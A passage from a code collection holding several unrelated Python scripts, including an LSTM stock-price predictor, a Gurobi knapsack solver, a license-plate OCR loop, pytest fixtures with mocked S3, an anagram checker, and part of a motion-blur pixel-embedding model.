길이 seq_len짜리 시퀀스로 만들기\n for index in range(len(data_raw) - seq_len): \n data.append(data_raw[index: index + seq_len])\n \n data = np.array(data);\n valid_set_size = int(np.round(valid_set_size_percentage/100*data.shape[0])); \n test_set_size = int(np.round(test_set_size_percentage/100*data.shape[0]));\n train_set_size = data.shape[0] - (valid_set_size + test_set_size);\n \n x_train = data[:train_set_size,:-1,:]\n y_train = data[:train_set_size,-1,:]\n \n x_valid = data[train_set_size:train_set_size+valid_set_size,:-1,:]\n y_valid = data[train_set_size:train_set_size+valid_set_size,-1,:]\n \n x_test = data[train_set_size+valid_set_size:,:-1,:]\n y_test = data[train_set_size+valid_set_size:,-1,:]\n \n return [x_train, y_train, x_valid, y_valid, x_test, y_test]\n\n#change와 volume 컬럼 삭제하기\ndf_stock = stock_df.copy()\n\ndf_stock.drop(['Change'],1,inplace=True)\ndf_stock.drop(['Volume'],1,inplace=True)\n\ncols = list(df_stock.columns.values)\nprint('df_stock.columns.values = ', cols)\n\n# 주식 데이터 정규화\ndf_stock_norm = df_stock.copy()\ndf_stock_norm = normalize_data(df_stock_norm)\n\n# 트레이닝, 테스트 데이터 생tjd\nseq_len = 10 # choose sequence length\nx_train, y_train, x_valid, y_valid, x_test, y_test = load_data(df_stock_norm, seq_len)\n#print('x_train.shape = ',x_train.shape)\n#print('y_train.shape = ', y_train.shape)\n#print('x_valid.shape = ',x_valid.shape)\n#print('y_valid.shape = ', y_valid.shape)\n#print('x_test.shape = ', x_test.shape)\n#print('y_test.shape = ',y_test.shape)\n\n\n#plt.figure(figsize=(15, 5));\n#plt.grid(True)\n#plt.plot(df_stock.index,df_stock_norm.Open.values, color='red', label='Open')\n#plt.plot(df_stock.index,df_stock_norm.Close.values, color='green', label='Close')\n#plt.plot(df_stock.index,df_stock_norm.Low.values, color='blue', label='Low')\n#plt.plot(df_stock.index,df_stock_norm.High.values, color='black', label='High')\n#\n#plt.title('SK stock')\n##plt.xlabel('시간[일]')\n#plt.ylabel('Normalized Price')\n#plt.legend(loc='best')\n#plt.show()\n#%%\n\nindex_in_epoch = 0;\nperm_array = np.arange(x_train.shape[0])\nnp.random.shuffle(perm_array)\n \n# function to get the next batch\ndef get_next_batch(batch_size):\n global index_in_epoch, x_train, perm_array \n start = index_in_epoch\n index_in_epoch += batch_size\n \n if index_in_epoch > x_train.shape[0]:\n np.random.shuffle(perm_array) # shuffle permutation array\n start = 0 # start next epoch\n index_in_epoch = batch_size\n \n end = index_in_epoch\n return x_train[perm_array[start:end]], y_train[perm_array[start:end]]\n\n# parameters\nn_steps = seq_len-1 \nn_inputs = 4 \nn_neurons = 200 \nn_outputs = 4\nn_layers = 2\nlearning_rate = 0.001\nbatch_size = 50\nn_epochs = 1000\ntrain_set_size = x_train.shape[0]\ntest_set_size = x_test.shape[0]\ntf.reset_default_graph()\n\nX = tf.placeholder(tf.float32, [None, n_steps, n_inputs])\ny = tf.placeholder(tf.float32, [None, n_outputs])\n##############################################################################\n##############################################################################\n################## #################\n################## RNN Cell 선택하기 #################\n################## #################\n##############################################################################\n##############################################################################\n\n# use Basic RNN Cell\n#layers = [tf.contrib.rnn.BasicRNNCell(num_units=n_neurons, activation=tf.nn.elu)\n# for layer in range(n_layers)]\n\n# use Basic LSTM Cell \n#layers = [tf.contrib.rnn.BasicLSTMCell(num_units=n_neurons, activation=tf.nn.elu)\n# for layer in range(n_layers)]\n\n# use LSTM Cell with peephole connections\nlayers = [tf.contrib.rnn.LSTMCell(num_units=n_neurons, \n activation=tf.nn.leaky_relu, use_peepholes = True)\n for layer in range(n_layers)]\n\n# use GRU cell\n#layers = [tf.contrib.rnn.GRUCell(num_units=n_neurons, activation=tf.nn.leaky_relu)\n# for layer in range(n_layers)]\n \n##############################################################################\n##############################################################################\n##############################################################################\n##############################################################################\n##############################################################################\n##############################################################################\n##############################################################################\n\nmulti_layer_cell = tf.contrib.rnn.MultiRNNCell(layers)\nrnn_outputs, states = tf.nn.dynamic_rnn(multi_layer_cell, X, dtype=tf.float32)\n\nstacked_rnn_outputs = tf.reshape(rnn_outputs, [-1, n_neurons]) \nstacked_outputs = tf.layers.dense(stacked_rnn_outputs, n_outputs)\noutputs = tf.reshape(stacked_outputs, [-1, n_steps, n_outputs])\noutputs = outputs[:,n_steps-1,:] # keep only last output of sequence\n \nloss = tf.reduce_mean(tf.square(outputs - y)) # loss function = mean squared error \noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate) \ntraining_op = optimizer.minimize(loss)\n \n# run graph\nwith tf.Session() as sess: \n sess.run(tf.global_variables_initializer())\n for iteration in range(int(n_epochs*train_set_size/batch_size)):\n x_batch, y_batch = get_next_batch(batch_size) # fetch the next training batch \n sess.run(training_op, feed_dict={X: x_batch, y: y_batch}) \n if iteration % int(5*train_set_size/batch_size) == 0:\n mse_train = loss.eval(feed_dict={X: x_train, y: y_train}) \n mse_valid = loss.eval(feed_dict={X: x_valid, y: y_valid}) \n print('%.2f epochs: MSE train/valid = %.6f/%.6f'%(\n iteration*batch_size/train_set_size, mse_train, mse_valid))\n\n y_train_pred = sess.run(outputs, feed_dict={X: x_train})\n y_valid_pred = sess.run(outputs, feed_dict={X: x_valid})\n y_test_pred = sess.run(outputs, feed_dict={X: x_test})\ncorr_price_development_train = np.sum(np.equal(np.sign(y_train[:,1]-y_train[:,0]),np.sign(y_train_pred[:,1]-y_train_pred[:,0])).astype(int)) / y_train.shape[0]\ncorr_price_development_valid = np.sum(np.equal(np.sign(y_valid[:,1]-y_valid[:,0]),np.sign(y_valid_pred[:,1]-y_valid_pred[:,0])).astype(int)) / y_valid.shape[0]\ncorr_price_development_test = np.sum(np.equal(np.sign(y_test[:,1]-y_test[:,0]),np.sign(y_test_pred[:,1]-y_test_pred[:,0])).astype(int)) / y_test.shape[0]\n\nprint('correct sign prediction for \"close - open\" price for train/valid/test: %.2f/%.2f/%.2f'%(\n corr_price_development_train, corr_price_development_valid, corr_price_development_test))\n\ndef reverse_min_max_scaling(org_x, x):\n org_x_np = np.asarray(org_x)\n x_np = np.asarray(x)\n return (x_np * (org_x_np.max() - org_x_np.min() + 1e-7)) + org_x_np.min()\npred_close = reverse_min_max_scaling(df_stock.copy(),y_test_pred[:,0])\npred_open = reverse_min_max_scaling(df_stock.copy(),y_test_pred[:,1])\npred_high = reverse_min_max_scaling(df_stock.copy(),y_test_pred[:,2])\npred_low = reverse_min_max_scaling(df_stock.copy(),y_test_pred[:,3])\n\n#%%\n\nft = 0 # 0 = close, 1 = open, 2 = highest, 3 = lowest\n\n## show predictions\ntitle_font = {'fontname':'NanumMyeongjo','size':'20','color':'black','weight':'normal','verticalalignment':'bottom'}\naxis_font = {'fontname':'NanumMyeongjo','size':'16'}\n\nplt.figure(figsize=(15, 10));\nplt.subplot(2,1,1);\nplt.grid(True)\nplt.plot(np.arange(y_train.shape[0]), y_train[:,ft], color='blue', label='train target')\n\nplt.plot(np.arange(y_train.shape[0], y_train.shape[0]+y_valid.shape[0]), y_valid[:,ft],\n color='gray', label='valid target')\n\nplt.plot(np.arange(y_train.shape[0]+y_valid.shape[0],\n y_train.shape[0]+y_test.shape[0]+y_test.shape[0]),\n y_test[:,ft], color='black', label='test target')\n\nplt.plot(np.arange(y_train_pred.shape[0]),y_train_pred[:,ft], color='red',\n label='train prediction')\n\nplt.plot(np.arange(y_train_pred.shape[0], y_train_pred.shape[0]+y_valid_pred.shape[0]),\n y_valid_pred[:,ft], color='orange', label='valid prediction')\n\nplt.plot(np.arange(y_train_pred.shape[0]+y_valid_pred.shape[0],y_train_pred.shape[0]+y_valid_pred.shape[0]+y_test_pred.shape[0]),y_test_pred[:,ft], color='green', label='test prediction')\n\nplt.title('Stock of SK Hynix')\n#plt.xlabel('일 수',**axis_font)\nplt.ylabel('normalized price')\nplt.legend(loc='upper left');\n\nplt.subplot(2,1,2);\nplt.grid(True)\nplt.plot(np.arange(y_train.shape[0]+y_test.shape[0], y_train.shape[0]+y_test.shape[0]+len(y_test[:,ft])),\n y_test[:,ft], color='black', label='test target')\n\nplt.plot(np.arange( y_train_pred.shape[0]+y_test_pred.shape[0], \n y_train_pred.shape[0]+y_test_pred.shape[0]+len(y_test_pred[:,ft])),\n y_test_pred[:,ft], color='green', label='test prediction')\n\n\nplt.xlabel('Days')\nplt.ylabel('normalized price')\nplt.legend(loc='best');\n\n#하루기준으로 오르면 1, 내리면 -1로하고, 타겟과 예측이 각각 1,-1로 서로 같으면 true, 다르면 false하여, 트루의 갯수를 합하고, 전체 트레인 타겟의 사이즈로 나 \n\n#%%\ndf22 = pd.DataFrame()\ndd22 = df22.append({\"Close\":\"\", \"Open\":\"\", \"High\":\"\", \"Low\":\"\", \"Volume\":\"\", \"Change\":\"\"}, ignore_index=True)\ndd22.ix[0, \"Close\"] = pred_close[0]\n\nresult = pd.concat([stock_df,dd22])\nfor item in [result]:\n item['5일 이동평균선'] = item['Close'].rolling(window=5).mean()\n item['30 Day STD'] = item['Close'].rolling(window=5).std()\n item['Upper Band'] = round(item['5일 이동평균선'] + (item['30 Day STD'] * 2),2)\n item['Lower Band'] = round(item['5일 이동평균선'] - (item['30 Day STD'] * 2),2)\n\n#stock_df[['Close', '30 Day MA', 'Upper Band', 'Lower Band']].plot(figsize=(12,6), grid = True)\nresult[['Close','5일 이동평균선', 'Upper Band', 'Lower Band']].iloc[-30:].plot(figsize=(12,6), grid = True)\nplt.title(Name + ' 5일 볼린져 밴드')\nplt.ylabel('가격')\nplt.show();\n#%%\n\nresult = result[['Close','Upper Band','Lower Band']]\nresult.iloc[-30:]\n\n\n\n#print(result.head(20))\n#print(result.info())\n##상한\n#print(result['Upper Band'].iloc[-30:])\n#print(result['Lower Band'].iloc[-30:])\n","sub_path":"senticle-CNN/Senticle-LSTM.py","file_name":"Senticle-LSTM.py","file_ext":"py","file_size_in_byte":11908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"530781435","text":"import json\nimport os.path\nfrom pprint import pprint\nfrom string import digits\nimport re, math\nfrom collections import Counter\nimport operator\nimport matplotlib.pyplot as plt\nfrom pylab import *\n\npos = arange(30)+.5\nl = []\n#l1 = []\ncount = 0\ndic = {}\n\nWORD = re.compile(r'\\w+')\n\ndef get_cosine(vec1, vec2):\n\tintersection = set(vec1.keys()) & set(vec2.keys())\n\tnumerator = sum([vec1[x] * vec2[x] for x in intersection])\n\tsum1 = sum([vec1[x]**2 for x in vec1.keys()])\n\t#print sum1\n\tsum2 = sum([vec2[x]**2 for x in vec2.keys()])\n\t#print sum2\n\tdenominator = math.sqrt(sum1) * math.sqrt(sum2)\n\t#print denominator\n\t #print \"denominator : \" + str(denominator) + \" numerator: \" + str(numerator)\n\tif not denominator:\n\t\treturn 0.0\n\telse:\n\t\treturn float(numerator) / denominator\n\t\ndef text_to_vector(text):\n\twords = WORD.findall(text)\n\treturn Counter(words)\n\ndef freq(var):\n\tif not dic:\n\t\tdic[var]=1\n\telse:\n\t\tfor key,value in dic.items():\n\t\t\tcosine = get_cosine(text_to_vector(key), text_to_vector(var))\n\t\t\tif (cosine > 0.7):\n\t\t\t\tcount = dic[key]\n\t\t\t\tcount+=1\n\t\t\t\tdic[key] = count\n\t\t\telse:\n\t\t\t\tdic[var]=1\n\t\treturn dic\t\t\n\t\t\n\ndef graph(d):\n\n\tplt.barh(pos, d.values(), align='center')\n\tplt.yticks(pos, (d.keys()))\n\n\t#plt.barh(range(len(d)), d.values(), align='center')\n\t#plt.yticks(range(len(d)), (d.keys()))\n\n\tfor i,v in enumerate(d.values()):\n\t\ttext(v + .2, i + .25, str(v), fontweight = 'bold', fontsize = '8')\n\txlim(0, 40)\n\n\tplt.xlabel('frequency', fontsize=18)\n\tplt.ylabel('keywords', fontsize=18)\n\tplt.title('Keywords v/s frequency',fontsize =20)\n\n\tplt.show()\t\n\ndef top30(x):\n\tsorted_dictionary = sorted(dic.items(), key=operator.itemgetter(1) , reverse=True)\n\tfor items in sorted_dictionary[:30:]:\n\t\tl.append(items)\n\t\tnew_dic= dict(l)\n\treturn new_dic\t\t\n\n\npath = []\ndirectory = '/home/shobhit/Query'\nfor filename in os.listdir(directory):\n\tif filename.endswith(\"Article 4v2.json\"):\n\t\t#print filename\n\t\tx = os.path.join(directory, filename)\n\t\tpath.append(x)\n#print path\n\t\t\n#count = 0\nfor journals in path:\n\t#print journals\n\n\twith open(journals) as data_file:\n\t\tjson1 = json.load(data_file)\n\n\t\tfor key,value in json1.items():\n\t\t\t#print key\n\t\t\tif key == \"details\":\n\t\t\t\tfor key_1,value_1 in value.items():\n\t\t\t\t\t#print key_1\n\t\t\t\t\tif key_1 == \"keywords\":\n\t\t\t\t\t\tfor ele in value_1:\n\t\t\t\t\t\t\tfor key_2,value_2 in ele.items():\n\t\t\t\t\t\t\t\tif key_2 == \"kwd\":\n\t\t\t\t\t\t\t\t\tfor ele in value_2:\n\t\t\t\t\t\t\t\t\t\tvar = ele.lower()\n\t\t\t\t\t\t\t\t\t\t#l.append(var)\n\t\t\t\t\t\t\t\t\t\tfreq(var)\n\n\t\t\t \n\t\t\telif key == \"referenced_articles\":\n\t\t\t\tfor ele in value:\n\t\t\t\t\tfor key,value in ele.items():\n\t\t\t\t\t\t#print key\n\t\t\t\t\t\tif key == \"details\":\n\t\t\t\t\t\t\tfor key_1,value_1 in value.items():\n\t\t\t\t\t\t\t\tif key_1 == 'keywords':\n\t\t\t\t\t\t\t\t\tfor ele in value_1:\n\t\t\t\t\t\t\t\t\t\tfor key_2,value_2 in ele.items():\n\t\t\t\t\t\t\t\t\t\t\tif key_2 == \"kwd\":\n\t\t\t\t\t\t\t\t\t\t\t\tfor ele in value_2:\n\t\t\t\t\t\t\t\t\t\t\t\t\tvar = ele.lower()\n\t\t\t\t\t\t\t\t\t\t\t\t\t#l1.append(var1)\n\t\t\t\t\t\t\t\t\t\t\t\t\tfreq(var)\n\t\t\t\t\t\ngraph(top30(dic))\n","sub_path":"keyfreq.py","file_name":"keyfreq.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"323592213","text":"from collections import namedtuple\r\nfrom gurobipy import *\r\nfrom IPython.display import FileLink\r\nimport csv\r\n\r\nItem = namedtuple(\"Item\", ['index', 'value', 'weight'])\r\n\r\ndef submission_generation(filename, str_output):\r\n with open(filename, 'w', newline='') as file:\r\n writer = csv.writer(file)\r\n for item in str_output:\r\n writer.writerow(item)\r\n return FileLink(filename)\r\n\r\n\r\ndef check_solution(capacity, items, taken):\r\n weight = 0\r\n value = 0\r\n for item in items:\r\n if taken[item.index] == 1:\r\n weight += item.weight\r\n value += item.value+0.5\r\n if weight > capacity:\r\n print(\"solución incorrecta, se supera la capacidad de la mochila (capacity, weight):\", capacity, weight)\r\n return 0\r\n return int(value)\r\n\r\n\r\ndef gurobi(sortedItems, capacityI):\r\n taken = [0]*len(sortedItems)\r\n\r\n indices = [x[0] for x in sortedItems]\r\n valores = [x[1] for x in sortedItems]\r\n pesos = [x[2] for x in sortedItems]\r\n\r\n valoresDict = dict(zip(indices, valores))\r\n pesosDict = dict(zip(indices, pesos))\r\n\r\n m = Model(\"mochila\")\r\n\r\n x1 = m.addVars(indices, vtype=GRB.BINARY, name=\"x\")\r\n m.addConstr(x1.prod(pesosDict) <= capacityI)\r\n m.setObjective(x1.prod(valoresDict), GRB.MAXIMIZE)\r\n\r\n m.setParam(GRB.Param.PoolSolutions, 2048)\r\n m.setParam(GRB.Param.PoolGap, 0.01)\r\n m.setParam(GRB.Param.PoolSearchMode, 1)\r\n m.setParam(GRB.Param.TimeLimit, 10.0)\r\n\r\n m.optimize()\r\n\r\n for e in indices:\r\n if x1[e].x > 0.9:\r\n taken[e] = 1\r\n\r\n return taken\r\n\r\n\r\ndef process(sortedItems, capacityI):\r\n\r\n sortedItems.sort(key=lambda x: x.value/x.weight)\r\n taken = gurobi(sortedItems, capacityI)\r\n maximo = check_solution(capacityI, sortedItems, taken)\r\n\r\n if maximo == 0:\r\n exit(1)\r\n\r\n # prepare the solution in the specified output format\r\n output_data = '%.2f' % maximo + ' ' + str(0) + '\\n'\r\n output_data += ' '.join(map(str, taken))\r\n\r\n return output_data, maximo\r\n\r\n\r\nif __name__ == \"__main__\":\r\n for dirname, _, filenames in os.walk('data'):\r\n for filename in filenames:\r\n print(os.path.join(dirname, filename))\r\n str_output = [[\"Filename\", \"Max_value\"]]\r\n for dirname, _, filenames in os.walk('data'):\r\n for filename in filenames:\r\n full_name = dirname + '/' + filename\r\n with open(full_name, 'r') as input_data_file:\r\n input_data = input_data_file.read()\r\n lines = input_data.split('\\n')\r\n firstLine = lines[0].split()\r\n item_count = int(firstLine[0])\r\n capacity = int(firstLine[1])\r\n\r\n items = []\r\n j = 1\r\n for i in range(1, item_count + 1):\r\n line = lines[i]\r\n parts = line.split()\r\n if int(parts[1]) <= capacity and int(parts[0]) > 0:\r\n items.append(Item(j - 1, int(parts[0])-0.5, int(parts[1])))\r\n j = j + 1\r\n output, value = process(items, capacity)\r\n print(filename, \"-------------\", value, \"----------------\")\r\n str_output.append([filename, str(value)])\r\n\r\n submission_generation('Grupo1_Gurobi.csv', str_output)","sub_path":"knapsack.py","file_name":"knapsack.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"437651993","text":"import cv2\nimport imutils\nfrom imutils import paths\n\nfrom solo.number_plate.pyimagesearch.anpr.anpr import PyImageSearchANPR\n\n\ndef cleanup_text(text):\n # strip out non-ASCII text so we can draw the text on the image\n # using OpenCV\n return \"\".join([c if ord(c) < 128 else \"\" for c in text]).strip()\n\n\n# initialize our ANPR class\nanpr = PyImageSearchANPR(True)\n\n# grab all image paths in the input directory\nimagePaths = sorted(list(paths.list_images(\"license_plates/group1\")))\n\n# loop over all image paths in the input directory\nfor imagePath in imagePaths:\n # load the input image from disk and resize it\n image = cv2.imread(\"../../img/in/Capture2.PNG\")\n image = imutils.resize(image, width=600)\n\n # apply automatic license plate recognition\n (lpText, lpCnt) = anpr.find_and_ocr(image, psm=7, clearBorder=True)\n\n # only continue if the license plate was successfully OCR'd\n if lpText is not None and lpCnt is not None:\n # fit a rotated bounding box to the license plate contour and\n # draw the bounding box on the license plate\n box = cv2.boxPoints(cv2.minAreaRect(lpCnt))\n box = box.astype(\"int\")\n cv2.drawContours(image, [box], -1, (0, 255, 0), 2)\n\n # compute a normal (unrotated) bounding box for the license\n # plate and then draw the OCR'd license plate text on the\n # image\n (x, y, w, h) = cv2.boundingRect(lpCnt)\n cv2.putText(image, cleanup_text(lpText), (x, y - 15),\n cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 255, 0), 2)\n\n # show the output ANPR image\n print(\"[INFO] {}\".format(lpText))\n cv2.imshow(\"Output ANPR\", image)\n cv2.waitKey(0)\n","sub_path":"src/solo/number_plate/ocr_license_plate.py","file_name":"ocr_license_plate.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"319664044","text":"# (D,C,H,S) + (A,2,3,4,5,6,7,8,9,0,J,Q,K) 用\"jk\"、\"JK\"分别表示小王、大王\n# 黑桃-spade 红桃-heart 方快-diamond 草花-club\nfrom os import rename\nfrom os import listdir\nfrom os.path import isfile, join\ndef rename_puke():\n\tpukes = []\n\tfor f in listdir():\n\t\tif isfile(f):\n\t\t\tif f == 'back.jpg':\n\t\t\t\tcontinue\n\t\t\tfix = f.split('.')\n\t\t\tif fix[1] == 'jpg':\n\t\t\t\tpukes.append(int(fix[0]))\n\n\tpukes.sort()\n\tcolors = ('S','H','C','D')\n\tnums = ('3','4','5','6','7','8','9','0','J','Q','K','A','2',)\n\t#print(str(pukes[0])+'.jpg', 'jk'+'.jpg')\n\t#print(str(pukes[1])+'.jpg', 'JK'+'.jpg')\n\trename(str(pukes[0])+'.jpg', 'jk1'+'.jpg')\n\trename(str(pukes[1])+'.jpg', 'jk2'+'.jpg')\n\tfor puke in pukes[2:]:\n\t\tindex = puke - 3\n\t\tcolor = index // 13\n\t\tnum = index % 13\n\t\tbefore = str(puke) + '.jpg'\n\t\tafter = colors[color] + nums[num] + '.jpg'\n\t\t#print(before, after)\n\t\trename(before, after)\n\nrename_puke()","sub_path":"grade/puke/modifiy.py","file_name":"modifiy.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"84521816","text":"import ezproxylookup\nimport boto3\nfrom moto import mock_s3\nimport pytest\n\n\n@pytest.fixture\ndef fake_config_json():\n config_json = \"\"\"\n\n [{\n \"title\": \"A Title\",\n \"config_file\": \"fake_config_file.txt\",\n \"urls\": [\"http://example.com\"]\n }]\n \"\"\"\n return config_json\n\n\n@pytest.fixture(autouse=True)\ndef aws_credentials(monkeypatch):\n monkeypatch.setenv('AWS_BUCKET_NAME', 'samples')\n\n\n@pytest.yield_fixture\ndef app():\n app = ezproxylookup.app\n ctx = app.test_request_context()\n ctx.push()\n yield app\n ctx.pop()\n\n\n@pytest.fixture\ndef client(app):\n app.config['TESTING'] = True\n app.config['SERVER_NAME'] = 'localhost'\n client = app.test_client()\n return client\n\n\n@pytest.fixture(autouse=True)\ndef s3_conn(fake_config_json):\n with mock_s3():\n conn = boto3.resource('s3', region_name='us-east-1')\n conn.create_bucket(Bucket='samples')\n # config.json must be an array of dicts, otherwise /econfig won't work\n # (for example, a single dict will cause it to fail)\n conn.Object('samples', 'config.json').put(Body=fake_config_json)\n yield conn\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"635865771","text":"\"\"\"Two words are anagrams of each other if the letters of one can be rearranged to fit the other. e.g. dormitory and dirty room.\n\nWrite a program that lets the user enter two strings, and tells them if they are anagrams of each other.\n\n Convert the strings into lists (list)\n Sort the letters of each word (sort)\n Check if the two are equal\n\nenter the first word: dormitory\nenter the second word: dirtyroom\n'dormitory' and 'dirtyroom' are anagrams\n\"\"\"\n\n# takes in a string from the use\nfirst_string = input(\"Enter the first word: \").lower()\nsecond_string = input(\"Enter the second word: \").lower()\n\n# function that splits each string into words, and then each word into a master list of letters, and then sorts the list alphabetically\ndef letter_splitter(user_input):\n str_to_words = user_input.split() \n all_letters = list()\n for word in str_to_words:\n letter = list(word)\n all_letters += letter\n all_letters.sort()\n return all_letters\n\nif letter_splitter(first_string) == letter_splitter(second_string):\n print(f'{first_string} and {second_string} are anagrams!')\nelse:\n print(f'{first_string} and {second_string} are not anagrams!')\n\n \n\n\n","sub_path":"lab10.py","file_name":"lab10.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"34180934","text":"\nfrom pyo import *\n\ns = Server().boot()\ns.start()\n\nfade = Fader(fadein=.1, mul=.07).play()\na = Noise(fade).mix(2).out()\n\nlf1 = Sine(freq=[.1, .15], mul=100, add=250)\nlf2 = Sine(freq=[.18, .15], mul=.4, add=1.5)\n\nb = Phaser(a, freq=lf1, spread=lf2, q=1, num=20, mul=.5).out(0)\n\ns.gui( locals() )\n","sub_path":"pyo_scripts/pyo_phaser.py","file_name":"pyo_phaser.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"645983822","text":"\n# coding: utf-8\n\n# Pixel Embedding Model\n# ================\n# **Author**: `Shu Kong `\n# \n# **Date**: Oct. 2018\n# \n# Training from scratch for many things in self-supervised/unsupervised learning manner.\n# \n# - Set the dataset class for loading data.\n# - Write the model architecture and loss functions.\n# - Train the model from scratch.\n# - Evaluate the model both quantitatively and qualitatively.\n\n# import packages\n# ------------------\n\n# In[1]:\n\n\nfrom __future__ import print_function, division\nimport os, random, time, copy\nfrom skimage import io, transform\nimport numpy as np\nimport os.path as path\nimport scipy.io as sio\nfrom scipy import misc\nfrom scipy import ndimage, signal\nimport scipy\nimport pickle\n\n\nimport math\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom io import BytesIO\nfrom skimage import data, img_as_float\nfrom skimage.measure import compare_ssim as ssim\nfrom skimage.measure import compare_psnr as psnr\n\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler \nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nimport torchvision\nfrom torchvision import datasets, models, transforms\n\nfrom utils.metrics import *\nfrom utils.flow_functions import *\nfrom models.pixel_embedding_model import *\nfrom datasetMotionBlur import *\nfrom trainvalGaussBlur import *\nimport pyblur\nimport warnings # ignore warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n# setup config parameters\n# -----------------\n\n# In[2]:\n\n\n# set device, which gpu to use.\ndevice ='cpu'\nif torch.cuda.is_available(): device='cuda:3'\n\n################## set attributes for this project/experiment ##################\n# config result folder\nexp_dir = './exp'\nproject_name = 'main004_MotionBlur_v0_Ksz17Res18softmax'\n\n#pretrainedModelPath = '../tutorial_pytorch_03_instSegm/exp/main004_instFromSemantic_v4_ftV3_largeLR/epoch-200.paramOnly' \n\n\n# config data loader \npath_to_root = '/home/skong2/scratch/dataset/MotionBlurDataset'\n\n\nbatch_size = 8\ngradLossWeight = 1.\n\nembedding_dim = 16 # dimension of the learned embedding space\nkernel_size = 17\ncropSize = [64, 64]\n# Gaussian blur kernel\nsigmaMin=0.5\nsigmaMax=2\n\nlambda_norm = 0.1\ntotal_epoch_num = 500 # total number of epoch in training\nbase_lr = 0.0005 # base learning rate\n\ntorch.cuda.device_count()\ntorch.cuda.empty_cache()\n\nsave_dir = os.path.join(exp_dir, project_name)\nprint(save_dir) \nif not os.path.exists(save_dir): os.makedirs(save_dir)\nlog_filename = os.path.join(save_dir, 'train.log')\n\n\n# define model architecture\n# ---------\n\n# In[3]:\n\n\nclass SiamesePixelEmbed(nn.Module):\n def __init__(self, emb_dimension=64, filterSize=11, device='cpu', pretrained=False):\n super(SiamesePixelEmbed, self).__init__()\n self.device = device\n self.emb_dimension = emb_dimension \n self.PEMbase = PixelEmbedModelResNet18(emb_dimension=self.emb_dimension, pretrained=pretrained) \n self.rawEmbFeature1 = 0\n self.rawEmbFeature2 = 0 \n self.embFeature1_to_2 = 0\n self.embFeature1_to_2 = 0\n self.filterSize = filterSize\n self.filterSize2Channel = self.filterSize**2\n \n self.ordered_embedding = nn.Sequential( \n nn.Conv2d(self.emb_dimension, self.filterSize2Channel, kernel_size=3, padding=1, bias=False),\n nn.ReLU(True),\n nn.BatchNorm2d(self.filterSize2Channel), \n nn.Conv2d(self.filterSize2Channel, self.filterSize2Channel, kernel_size=3, padding=1, bias=False),\n nn.ReLU(True),\n nn.BatchNorm2d(self.filterSize2Channel), \n nn.Conv2d(self.filterSize2Channel, self.filterSize2Channel, kernel_size=3, padding=1, bias=True)\n )\n \n \n def forward(self, inputs1, inputs2): \n self.rawEmbFeature1 = self.PEMbase.forward(inputs1)\n #self.rawEmbFeature2 = self.PEMbase.forward(inputs2)\n \n #img1_to_img2 = torch.cat([self.rawEmbFeature1, self.rawEmbFeature2], 1)\n #img2_to_img1 = torch.cat([self.rawEmbFeature2, self.rawEmbFeature1], 1)\n \n self.embFeature1_to_2 = self.ordered_embedding(self.rawEmbFeature1) \n self.embFeature1_to_2 = F.softmax(self.embFeature1_to_2, 1)\n \n #self.embFeature2_to_1 = self.ordered_embedding(img2_to_img1)\n #self.embFeature2_to_1 = F.softmax(self.embFeature2_to_1, 1)\n \n return self.embFeature1_to_2 #self.embFeature2_to_1, self.embFeature1_to_2 \n\n\n# define loss function\n# ---------\n\n# In[4]:\n\n\nclass LossOrderedPairReconstruction(nn.Module):\n def __init__(self, device='cpu', filterSize=11):\n super(LossOrderedPairReconstruction, self).__init__()\n self.device = device\n self.filterSize = filterSize \n self.filterSize2Channel = self.filterSize**2\n self.reconstructImage = 0\n \n def forward(self, image1, image2, filters_img1_to_img2):\n N,C,H,W = image1.size()\n self.reconstructImage = self.rgbImageFilterFlow(image1, filters_img1_to_img2)\n diff = self.reconstructImage - image2 \n diff = torch.abs(diff) \n totloss = torch.sum(torch.sum(torch.sum(torch.sum(diff)))) \n return totloss/(N*C*H*W)\n \n \n def rgbImageFilterFlow(self, img, filters): \n inputChannelSize = 1\n outputChannelSize = 1\n N = img.size(0)\n paddingFunc = nn.ZeroPad2d(int(self.filterSize/2))\n img = paddingFunc(img) \n imgSize = [img.size(2),img.size(3)]\n \n out_R = F.unfold(img[:,0,:,:].unsqueeze(1), (self.filterSize, self.filterSize))\n out_R = out_R.view(N, out_R.size(1), imgSize[0]-self.filterSize+1, imgSize[1]-self.filterSize+1) \n #out_R = paddingFunc(out_R)\n out_R = torch.mul(out_R, filters)\n out_R = torch.sum(out_R, dim=1).unsqueeze(1)\n\n out_G = F.unfold(img[:,1,:,:].unsqueeze(1), (self.filterSize, self.filterSize))\n out_G = out_G.view(N, out_G.size(1), imgSize[0]-self.filterSize+1, imgSize[1]-self.filterSize+1) \n #out_G = paddingFunc(out_G)\n out_G = torch.mul(out_G, filters)\n out_G = torch.sum(out_G, dim=1).unsqueeze(1)\n\n out_B = F.unfold(img[:,2,:,:].unsqueeze(1), (self.filterSize, self.filterSize))\n out_B = out_B.view(N, out_B.size(1), imgSize[0]-self.filterSize+1, imgSize[1]-self.filterSize+1) \n #out_B = paddingFunc(out_B)\n out_B = torch.mul(out_B, 